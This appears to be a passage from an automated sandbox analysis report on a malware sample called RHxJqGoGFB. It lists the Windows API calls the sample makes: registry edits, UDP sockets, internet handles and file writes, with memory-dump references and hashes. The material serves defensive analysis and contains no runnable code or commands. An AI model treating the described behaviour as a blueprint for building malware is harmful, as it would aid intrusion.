                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00900AED
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00900B5D
                                                                                                            • InternetCloseHandle.WININET(?), ref: 00900B73
                                                                                                            • InternetCloseHandle.WININET(?), ref: 00900B89
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Internet$CloseFileHandle$CountOpenTick$CreateReadWritelstrcpylstrlenwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 999627789-0
                                                                                                            • Opcode ID: f9257bd025f7c7641b69ff27dc9d838108b44dbd5a2639021080b58e88f41447
                                                                                                            • Instruction ID: 5bbb1422f0b424f8dd43d162aa752c3ecfc24c492b3bc5b82f663a83be0071cd
                                                                                                            • Opcode Fuzzy Hash: f9257bd025f7c7641b69ff27dc9d838108b44dbd5a2639021080b58e88f41447
                                                                                                            • Instruction Fuzzy Hash: 0D512971A00618AFEF34CB54DC49BEAB7B9AB84306F0046D9E249A61D1DBB45FC4CF91
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(000493E0), ref: 008F87D1
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,008F84C1,00000000,00000000,00000000), ref: 008F885C
                                                                                                              • Part of subcall function 008F41C6: RtlEnterCriticalSection.NTDLL(00909030), ref: 008F41D6
                                                                                                              • Part of subcall function 008F41C6: RtlLeaveCriticalSection.NTDLL(00909030), ref: 008F4260
                                                                                                            • Sleep.KERNEL32(00000200), ref: 008F8870
                                                                                                            • Sleep.KERNEL32(00000100), ref: 008F8884
                                                                                                            • Sleep.KERNEL32(00000100), ref: 008F889F
                                                                                                            • Sleep.KERNEL32(00000400), ref: 008F88BD
                                                                                                            • Sleep.KERNEL32(00249F00), ref: 008F88D7
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 008F88E4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Sleep$CriticalSectionThread$CreateEnterExitLeaveUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 485722307-0
                                                                                                            • Opcode ID: 80f9661180d048fc587356fd32b5241a2a999257c54e83adef56e26873702e9b
                                                                                                            • Instruction ID: 106379796d5d9d6d0ff807b955938ac7b94148a788cb217950ab1a5ae849522b
                                                                                                            • Opcode Fuzzy Hash: 80f9661180d048fc587356fd32b5241a2a999257c54e83adef56e26873702e9b
                                                                                                            • Instruction Fuzzy Hash: 8831ADB095421CEFEB50AB74EC497BA7B74FB00709F1041A9E305E6291CFB54985CB26
                                                                                                            APIs
                                                                                                            • socket.WS2_32(00000002,00000002,00000011), ref: 008F7203
                                                                                                            • sendto.WS2_32(?,?,00000000,00000000,00000000,00000010), ref: 008F726D
                                                                                                            • select.WS2_32(?,00000000,00000000,00000000,0000000F), ref: 008F7345
                                                                                                            • recvfrom.WS2_32(?,?,00001000,00000000,00000000,00000010), ref: 008F7374
                                                                                                            • closesocket.WS2_32(?), ref: 008F750D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: closesocketrecvfromselectsendtosocket
                                                                                                            • String ID: @
                                                                                                            • API String ID: 4198204009-2766056989
                                                                                                            • Opcode ID: b434aa31a44d693dae8ac6159c4ed3c2f978e9c7dc603361e61c5f0dda9b52c3
                                                                                                            • Instruction ID: 7b4877dc393166492e1315a6c82998e9c1786f31d168783381ffb634993c10a1
                                                                                                            • Opcode Fuzzy Hash: b434aa31a44d693dae8ac6159c4ed3c2f978e9c7dc603361e61c5f0dda9b52c3
                                                                                                            • Instruction Fuzzy Hash: 27916871D081AC9AEB28CB24DC55BF9BB75BF44310F5042E9E3A9E6280DBB05EC48F55
                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.KERNEL32(008F9F2F,008F2E8C,00000000,000F003F,008F9F2F), ref: 008F8FA0
                                                                                                            • RegEnumValueA.KERNEL32(008F9F2F,00000000,00000000,00000104,00000000,00000000,00000000,00000000), ref: 008F8FD7
                                                                                                            • RegDeleteValueA.KERNEL32(008F9F2F,00000000), ref: 008F9000
                                                                                                            • RegEnumKeyExA.KERNEL32(008F9F2F,00000000,00000000,00000104,00000000,00000000,00000000,00000000), ref: 008F9038
                                                                                                            • wsprintfA.USER32 ref: 008F906B
                                                                                                            • RegDeleteKeyA.ADVAPI32(008F9F2F,00000000), ref: 008F9092
                                                                                                            • RegCloseKey.ADVAPI32(008F9F2F), ref: 008F90AF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DeleteEnumValue$CloseOpenwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 2321319729-0
                                                                                                            • Opcode ID: a132d47a5117c6da6e13a016bec5107e73ebeb272db513313d6fb4f9cb4fd808
                                                                                                            • Instruction ID: f0cbc8a37211dd748f04e06386b09d8db60fd08b8c80171379dd894c4372ca75
                                                                                                            • Opcode Fuzzy Hash: a132d47a5117c6da6e13a016bec5107e73ebeb272db513313d6fb4f9cb4fd808
                                                                                                            • Instruction Fuzzy Hash: 234130B5A00648FBDF14CBA4CC84BEEB7B9BF48704F10C299E345E6180DB745A888F95
                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,008F244C,00000000,000F003F,?,?), ref: 00902F03
                                                                                                            • RegSetValueExA.KERNELBASE(?,008F2488,00000000,00000004,00000002,00000004), ref: 00902F31
                                                                                                            • RegCloseKey.KERNEL32(?), ref: 00902F3E
                                                                                                            • lstrcpy.KERNEL32(00000000,008F2550), ref: 00902F99
                                                                                                            • lstrcat.KERNEL32(00000000,008F2548), ref: 00902FAC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenValuelstrcatlstrcpy
                                                                                                            • String ID: >
                                                                                                            • API String ID: 1115058322-325317158
                                                                                                            • Opcode ID: 705def7332f79bc3b7116cd6fb66a8c0be1996e2dfd8b3be2e82fbf808017804
                                                                                                            • Instruction ID: 1727ff7f528e22b4482c0b0ffa9bfdd679e81aaec693207ecc1b4d31839ae02a
                                                                                                            • Opcode Fuzzy Hash: 705def7332f79bc3b7116cd6fb66a8c0be1996e2dfd8b3be2e82fbf808017804
                                                                                                            • Instruction Fuzzy Hash: 94312DB5900214AFDB24DB54DC49BE9B379FF69340F0086CAE74966294D6B45EC4CF90
                                                                                                            APIs
                                                                                                            • lstrcpy.KERNEL32(?,?), ref: 00900BC8
                                                                                                            • GetTickCount.KERNEL32 ref: 00900BCE
                                                                                                            • lstrlen.KERNEL32(?,008F3D08,00000000), ref: 00900BE1
                                                                                                            • wsprintfA.USER32 ref: 00900BEF
                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000020,00000000), ref: 00900C0E
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00900C2A
                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00900C37
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseCountCreateDeleteHandleTicklstrcpylstrlenwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 3232967151-0
                                                                                                            • Opcode ID: 34a44930f837d803eb886e4d6dd4e3efaed531e5b6550324572ec23f9074e8a0
                                                                                                            • Instruction ID: bd1ba4422d0e59851b709889111457a270070bef7402624eae89e4c5ad4cc369
                                                                                                            • Opcode Fuzzy Hash: 34a44930f837d803eb886e4d6dd4e3efaed531e5b6550324572ec23f9074e8a0
                                                                                                            • Instruction Fuzzy Hash: F111A1B5600218BBEF209B64DC4DFAA777CBF44705F0046A5F709F21D1D6749A468F54
                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.KERNEL32(00000001,?,00000000,000F003F,?), ref: 00902E52
                                                                                                            • RegSetValueExA.KERNEL32(?,00000001,00000000,00000004,00000001,00000004), ref: 00902E6E
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00902E78
                                                                                                            • RegCreateKeyA.ADVAPI32(00000001,?,?), ref: 00902E8C
                                                                                                            • RegSetValueExA.KERNEL32(?,00000001,00000000,00000004,00000001,00000004), ref: 00902EA8
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00902EB2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseValue$CreateOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2738932338-0
                                                                                                            • Opcode ID: ac1f01efed188ca4d03b8c0d6b485ead197847d6515f5d20eb7bf44e0efaa403
                                                                                                            • Instruction ID: c149724eb3bcf51e69c1c0f3502f2f6a15fc3ab8609d48c786d34a32f5dfa77a
                                                                                                            • Opcode Fuzzy Hash: ac1f01efed188ca4d03b8c0d6b485ead197847d6515f5d20eb7bf44e0efaa403
                                                                                                            • Instruction Fuzzy Hash: 1711ECB9A80208BBDB04DFD4DD49FAE77BDBF48700F108649FB0597190D6709A449B50
                                                                                                            APIs
                                                                                                            • wsprintfA.USER32 ref: 008F4C2F
                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 008F4CDD
                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 008F4D04
                                                                                                            • RegSetValueExA.KERNELBASE(?,?,00000000,00000004,?,00000004), ref: 008F4D2E
                                                                                                            • lstrlen.KERNEL32(?), ref: 008F4D3D
                                                                                                            • RegSetValueExA.KERNELBASE(?,?,00000000,00000001,?,00000000), ref: 008F4D5D
                                                                                                            • RegCloseKey.KERNEL32(?), ref: 008F4D6F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Valuelstrcpy$Closelstrlenwsprintf
                                                                                                            • String ID: joneC:\Windows\
                                                                                                            • API String ID: 3050549977-2213015650
                                                                                                            • Opcode ID: f32e671479a0f1c30aea2b5ddf11fb0a5ac05a75f0a661905f45ffd478488ecf
                                                                                                            • Instruction ID: bf23c298dcd976bf702d5fd819c079a887a0cc3144d7021c0534faf190f00a3a
                                                                                                            • Opcode Fuzzy Hash: f32e671479a0f1c30aea2b5ddf11fb0a5ac05a75f0a661905f45ffd478488ecf
                                                                                                            • Instruction Fuzzy Hash: 8331167590021CAFCB18DF24CC969EAB775FB59305F10959AE70AAB245D6309AC1CF90
                                                                                                            APIs
                                                                                                            • InterlockedIncrement.KERNEL32(009094C8), ref: 008F8500
                                                                                                            • htons.WS2_32(00000000), ref: 008F8559
                                                                                                              • Part of subcall function 008F719B: socket.WS2_32(00000002,00000002,00000011), ref: 008F7203
                                                                                                              • Part of subcall function 008F719B: sendto.WS2_32(?,?,00000000,00000000,00000000,00000010), ref: 008F726D
                                                                                                              • Part of subcall function 008F719B: select.WS2_32(?,00000000,00000000,00000000,0000000F), ref: 008F7345
                                                                                                            • GetTickCount.KERNEL32 ref: 008F85C1
                                                                                                              • Part of subcall function 008F719B: recvfrom.WS2_32(?,?,00001000,00000000,00000000,00000010), ref: 008F7374
                                                                                                              • Part of subcall function 008F719B: closesocket.WS2_32(?), ref: 008F750D
                                                                                                            • InterlockedDecrement.KERNEL32(009094C8), ref: 008F86EA
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 008F86F2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Interlocked$CountDecrementExitIncrementThreadTickUserclosesockethtonsrecvfromselectsendtosocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 1469894868-0
                                                                                                            • Opcode ID: 9b783e40dda0d9278befe47dc006af8cf3d76935378fecd21395ca56f5c663c1
                                                                                                            • Instruction ID: 68daaa2d59086a9e37a29d0d1085a6c614986bef027352162584c1148941d460
                                                                                                            • Opcode Fuzzy Hash: 9b783e40dda0d9278befe47dc006af8cf3d76935378fecd21395ca56f5c663c1
                                                                                                            • Instruction Fuzzy Hash: 6E5164B4A04258DFDB20DB64C859BE9B3B4FF44304F0085D9E28CAB246EBB19AC4CF51
                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000009,?), ref: 00901DD7
                                                                                                            • RegEnumValueA.KERNEL32(?,00000000,00000000,00000100,00000000,00000000,00000000,00000000), ref: 00901E14
                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00901E3D
                                                                                                            • Sleep.KERNEL32(00000100), ref: 00901E73
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00901E90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesCloseEnumFileOpenSleepValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 684116133-0
                                                                                                            • Opcode ID: 920b6ae84dace115923b08a638c7cefc19070f2033836a60056b51987e196d2d
                                                                                                            • Instruction ID: 98f522c4e97d8589919f84bbbce9feac590061ba6f5bb6d4e53ccbab634c4be5
                                                                                                            • Opcode Fuzzy Hash: 920b6ae84dace115923b08a638c7cefc19070f2033836a60056b51987e196d2d
                                                                                                            • Instruction Fuzzy Hash: DA218E75D00218EFDB20DB64DC49BE9B7B8AB58704F1046D9E648A61C1D7F45EC48F90
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4171472191.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4168525358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ferrorfprintffread
                                                                                                            • String ID: error reading file
                                                                                                            • API String ID: 1755398252-2448569628
                                                                                                            • Opcode ID: 3a23ba83af7d7a49e9a70f0845fefd60107209cf51a7234a0bdaa7c0e26c2aa0
                                                                                                            • Instruction ID: a508e8d9f2e3df7d2e0c38a6eb92dea9ea7baa2be3f17d527d746593b82cc440
                                                                                                            • Opcode Fuzzy Hash: 3a23ba83af7d7a49e9a70f0845fefd60107209cf51a7234a0bdaa7c0e26c2aa0
                                                                                                            • Instruction Fuzzy Hash: 4E1133B5A002049BEB14DB58CC85B9A73B9EB44304F1081BAF919FB3E2E638DD41CB59
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00014000), ref: 00902801
                                                                                                              • Part of subcall function 008FC89A: MapViewOfFile.KERNEL32(000001C8,00000006,00000000,00000000,00015400), ref: 008FC8D1
                                                                                                              • Part of subcall function 008FC89A: UnmapViewOfFile.KERNEL32(00000000), ref: 008FC900
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00902849
                                                                                                            • Sleep.KERNEL32(00002800), ref: 00902924
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 00902947
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileGlobalView$AllocExitFreeSleepThreadUnmapUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 2983513495-0
                                                                                                            • Opcode ID: 1ac9ef61d5c60612e2bec0dd3a849f9a1100a070b401db2f6313a4689897fcaf
                                                                                                            • Instruction ID: f4648d1edb0d3bf79d6b1f95da5a2fdda047689dd7b41c31ac289d9855e80a8c
                                                                                                            • Opcode Fuzzy Hash: 1ac9ef61d5c60612e2bec0dd3a849f9a1100a070b401db2f6313a4689897fcaf
                                                                                                            • Instruction Fuzzy Hash: 5B3192B1E01208EFDB00DBA4DE4AF9A77B4FF99720F148325E915A63D1E77659008B62
                                                                                                            APIs
                                                                                                            • _controlfp.MSVCRT ref: 004012FE
                                                                                                            • __set_app_type.MSVCRT ref: 0040130C
                                                                                                            • __getmainargs.MSVCRT ref: 0040132A
                                                                                                              • Part of subcall function 00401000: fclose.MSVCRT ref: 00401173
                                                                                                              • Part of subcall function 00401000: exit.MSVCRT ref: 00401181
                                                                                                            • exit.MSVCRT ref: 0040134D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4171472191.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4168525358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: exit$__getmainargs__set_app_type_controlfpfclose
                                                                                                            • String ID:
                                                                                                            • API String ID: 3616723909-0
                                                                                                            • Opcode ID: 29765abe234eb0aeb2cfb963d8110be80fc0057dc0bffaeb3d376abe5a34c2f3
                                                                                                            • Instruction ID: b284c9c70692a63f7b64cf06792a3025296de332bce8aa08f5d0d2bb093fb746
                                                                                                            • Opcode Fuzzy Hash: 29765abe234eb0aeb2cfb963d8110be80fc0057dc0bffaeb3d376abe5a34c2f3
                                                                                                            • Instruction Fuzzy Hash: 76F0B2F6D00108ABEB00EAE9DD42F8F72BCAB08308F100476B515F3251E679EA1887A5
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(00001000), ref: 00901EA3
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 00901EEA
                                                                                                              • Part of subcall function 00901D8F: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000009,?), ref: 00901DD7
                                                                                                              • Part of subcall function 00901D8F: RegEnumValueA.KERNEL32(?,00000000,00000000,00000100,00000000,00000000,00000000,00000000), ref: 00901E14
                                                                                                              • Part of subcall function 00901D8F: RegCloseKey.ADVAPI32(?), ref: 00901E90
                                                                                                            • Sleep.KERNEL32(00004E20), ref: 00901EC6
                                                                                                              • Part of subcall function 00901D8F: GetFileAttributesA.KERNEL32(00000000), ref: 00901E3D
                                                                                                              • Part of subcall function 00901D8F: Sleep.KERNEL32(00000100), ref: 00901E73
                                                                                                            • Sleep.KERNEL32(00057E40), ref: 00901EE0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Sleep$AttributesCloseEnumExitFileOpenThreadUserValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3734488975-0
                                                                                                            • Opcode ID: 32113ee59ba9030dbb9034d1e4e0619f025baad0d3f56925f8a6377997fe10a5
                                                                                                            • Instruction ID: e6d4683e00ac5ddd14b682090066d931a5a2c80885bdedfdf26b1c0a7c036de8
                                                                                                            • Opcode Fuzzy Hash: 32113ee59ba9030dbb9034d1e4e0619f025baad0d3f56925f8a6377997fe10a5
                                                                                                            • Instruction Fuzzy Hash: 39E012BA645304BFEA0167A0FC0EF1B3759BF59746F445222FB06852D0DA72D4008662
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009024BB
                                                                                                            • CloseHandle.KERNEL32(?), ref: 009024DB
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009024F3
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 009024FA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
